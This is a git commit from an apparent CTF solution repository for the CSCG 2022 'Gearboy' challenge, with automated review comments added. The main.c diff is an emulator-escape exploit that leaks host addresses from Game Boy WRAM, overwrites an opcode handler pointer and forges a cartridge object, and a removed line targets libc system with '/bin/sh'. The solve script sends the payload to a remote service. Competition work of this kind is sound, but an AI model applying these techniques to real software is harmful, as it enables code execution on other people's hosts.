cscg22-gearboy

CSCG 2022 Challenge 'Gearboy'
git clone https://git.sinitax.com/sinitax/cscg22-gearboy

commit e3357dff0937f0d7f5c3bbf75bc479f566fee3d0
parent a1f7b8843f887d2d698477d6d8544e545a517725
Author: Louis Burda <quent.burda@gmail.com>
Date:   Thu, 26 May 2022 20:41:58 +0200

Trolled by load instruction

Diffstat:
MMakefile | 2+-
Mmain.c | 43+++++++++++++++++++++++++++++++++----------
Msolve.py | 6++++--
3 files changed, 38 insertions(+), 13 deletions(-)

diff --git a/Makefile b/Makefile
@@ -22,7 +22,7 @@ main.gb: main.c $(LCC)
 $(LCC) -o $@ -Wall $< -Wl-yp0x143=0x80
 $(GEARBOY):
- make -C ./gearboy/platforms/linux
+ DEBUG=1 make -C ./gearboy/platforms/linux
 run: $(GEARBOY) main.gb
 $(GEARBOY) main.gb
diff --git a/main.c b/main.c
@@ -4,8 +4,13 @@
 void
 main(void)
 {
- volatile static uint8_t *processor;
- volatile static uint8_t *memory;
+ volatile static uint8_t *processor_gb;
+ volatile static uint8_t *memory_gb;
+ volatile static uint8_t *gbcore_gb;
+ volatile static uint8_t *cartridge_gb;
+ volatile static uint64_t memory;
+ volatile static uint64_t processor;
+ volatile static uint64_t cartridge;
 volatile static uint64_t op0x00;
 volatile static uint64_t base;
 volatile static uint64_t libc;
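Review bot: The `DEBUG=1` added to the `$(GEARBOY)` recipe will yield a differently laid-out emulator binary whenever that flag changes optimisation level or compiles in extra code, while main.c in the same commit hard-codes offsets (`0x1d420`, `0x13df0`) relative to a leaked handler address that can only be valid for one specific build. Nothing in the Makefile records which binary those offsets were measured against, so a local DEBUG build and the deployed one can silently disagree. I would add above the recipe `# DEBUG=1 is for local tracing only; offsets in main.c must be taken from the deployed (non-DEBUG) gearboy binary`, or split this into a separate `debug` target so the default build still matches the target.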
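Review bot: `volatile static uint64_t libc;` survives as context here although the second hunk of this commit removes the only assignment to it visible in the diff, so `libc` (and likely `leak`, declared just past this hunk) is now dead state that still occupies a volatile static slot in a size-constrained ROM. main() continues well beyond these hunks, so confirm there is no later use before deleting; if they are being kept for the next iteration, a marker such as `/* unused since the base-address leak replaced the libc leak */` would save the next reader from chasing them. The split into `*_gb` pointers and plain 64-bit integers is sensible but undocumented; a one-line convention comment at the top of the declarations, `/* *_gb: addresses inside GB WRAM; plain names: host addresses read back out of the emulator */`, would make the second hunk much easier to follow.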
@@ -17,17 +22,35 @@ main(void)
 /* processor - wrambanks = -0x126a0 */
 /* WRAM BANK = -0x13 */
- processor = (void*) 0xD960;
+ processor_gb = (void*) 0xD960;
+ memory_gb = processor_gb - 0xd0;
+
+ /* leak base addr */
+ op0x00 = *(uint64_t*)processor_gb;
+ base = op0x00 - 0x1d420;
+ target = base + 0x13df0;
+
+ /* get real adresses */
+ processor = *(uint64_t*)memory_gb;
 memory = processor - 0xd0;
- /* leak libc from addr */
- leak = *(uint64_t*)(memory + 0x30);
- libc = leak + 0x125cff0;
- target = libc + 0x52290; /* system */
+ *(uint64_t*)processor_gb = target;
+
+ /* setup fake cartridge opject behind processor & memory */
+ cartridge = processor - 0x960;
+ cartridge_gb = (void*) 0xD000; /* start of wram bank */
+ *(uint8_t*)(cartridge_gb+0x30) = 1; /* loaded */
+ *(uint8_t*)(cartridge_gb+0x40) = 1; /* battery */
+ strcpy((char*)(cartridge_gb+0x41), "/home/ctf/wrapper.py"); /* filepath */
+
+ /* setup fake gameboycore object */
+ gbcore_gb = processor_gb; /* at processor addr */
+ // *(uint64_t*)(gbcore_gb+0x00) = memory;
+ // *(uint64_t*)(gbcore_gb+0x08) = processor;
+ // *(uint64_t*)(gbcore_gb+0x28) = cartridge;
- /* set opcode 0x00 (nop) to gadget */
- strcpy(processor, "/bin/sh");
- *(uint64_t*)(processor+0x10*0x10) = target;
+ /* set opcode 0x10 (stop) to saveRam */
+ // *(uint64_t*)(processor+0x10*0x10) = target;
 // *(uint64_t*)(processor+0x10*0x10) = 0;
 __asm \
diff --git a/solve.py b/solve.py
@@ -12,8 +12,10 @@ state = list(open("main.state", "rb").read())
 for i,v in enumerate(struct.pack("<i", -0x13)):
 state[0x10000+i] = v
-io = process("ncat --ssl 61a837693e76115bbb874401-gearboy.challenge.master.cscg.live 31337".split())
-#io = process("ncat localhost 1024".split())
+if len(argv) > 1:
+ io = process(argv[1:])
+else:
+ io = process("ncat localhost 1024".split())
 io.sendline(b64encode(bytes(rom)))
 io.sendline(b64encode(bytes(state)))
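Review bot: The live opcode-table hijack, `*(uint64_t*)processor_gb = target;`, has no comment, while the retained `/* set opcode 0x10 (stop) to saveRam */` now labels only a commented-out line; the write replaces the opcode 0x00 (nop) entry that `op0x00` was just leaked from, so the deleted comment (`set opcode 0x00 (nop) to gadget`) described the surviving code better than the one kept. I would put the explanation on the write itself, e.g. `/* overwrite the opcode 0x00 (nop) handler with target = base + 0x13df0; base is derived from the leaked nop handler (offset 0x1d420 in this gearboy build) */`, since those two constants are otherwise unexplained and are presumably tied to one specific binary. Two smaller points: the 64-bit store is presumably emitted as several byte-wide writes on the GB CPU, so the table entry is torn until the last one lands, which only works if no nop (interrupt handlers included) is dispatched in between — worth stating if that assumption is relied on; and the `strcpy` of the 21-byte path occupies 0xD041..0xD055, clear of the `+0x30`/`+0x40` flag bytes and of `processor_gb` at 0xD960, which matches `cartridge = processor - 0x960`, but a comment giving the layout of the three fake-object regions would make that non-overlap checkable. main() continues past `__asm \` outside this hunk.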
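Review bot: `argv` on the new `if len(argv) > 1:` line needs `from sys import argv` (or `sys.argv`) in the import block, which lies outside this hunk; if the script relies on pwntools' `from pwn import *`, I do not believe that export list includes `argv`, and the run would fail with NameError before anything is sent. If it is already imported, ignore this; otherwise `import sys` plus `io = process(sys.argv[1:])` is the smallest fix. A usage comment above the branch, `# usage: solve.py [cmd...], e.g. solve.py ncat --ssl <host> 31337; defaults to local ncat on 1024`, would also keep a record of the remote invocation that this commit deletes.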